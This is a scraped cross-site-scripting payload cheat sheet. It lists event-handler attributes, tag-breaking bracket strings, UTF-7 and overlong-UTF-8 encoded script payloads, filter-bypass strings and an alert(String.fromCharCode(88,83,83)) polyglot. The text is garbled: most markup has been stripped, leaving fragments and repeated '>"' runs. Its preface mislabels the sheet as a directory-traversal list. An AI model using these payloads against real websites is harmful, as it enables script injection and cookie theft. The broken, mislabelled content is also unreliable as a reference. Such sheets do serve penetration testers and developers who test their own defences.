Title: Ultimate Cross Site Scripting Attack Cheat Sheet Last Update: 2018-06-28 Note: This is a technical sheet for research about directory- and path traversal attacks. Please continue the ultimate directory traversal cheat sheet list or contribute to update. This cheat sheet list goes out to assist pentesters, developers, researchers & whitehats. Tags to Trigger XSS Attacks: onclick ondblclick onmousedown onmousemove onmouseover onmouseout onmouseup onkeydown onkeypress onkeyup onabort onerror onload onresize onscroll onunload onsubmit onblur onchange onfocus onreset onselect onMoveOn Brackets for Tags >" "> <" >< >"< .\>"%20<./ />%20< %20/%20> %20">%20< %3E%3C Pjw= XSS Strings:
exp/* ]] document.cookie=true'); ?> +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
& &{document.cookie=true;}; @mario_payload
< ;
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Restriction Bypass: >" >" >" >"
>"
>"
>"
>" >" >" >"exp/* >" >" >" >" >" >" >"]] >" >" >"document.cookie=true'); ?> >" +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- >" >"
>" >" >" >" >"& >"&{document.cookie=true;}; >" >" >" >" >" >" >"
>"
>"
>"
>" >" >" >"< >" >" >" >" >" >"; >"
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Others: Random ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> '';!--"=&{()} "> perl -e 'print "";' > out perl -e 'print "alert(\"XSS\")";' > out < \";alert('XSS');//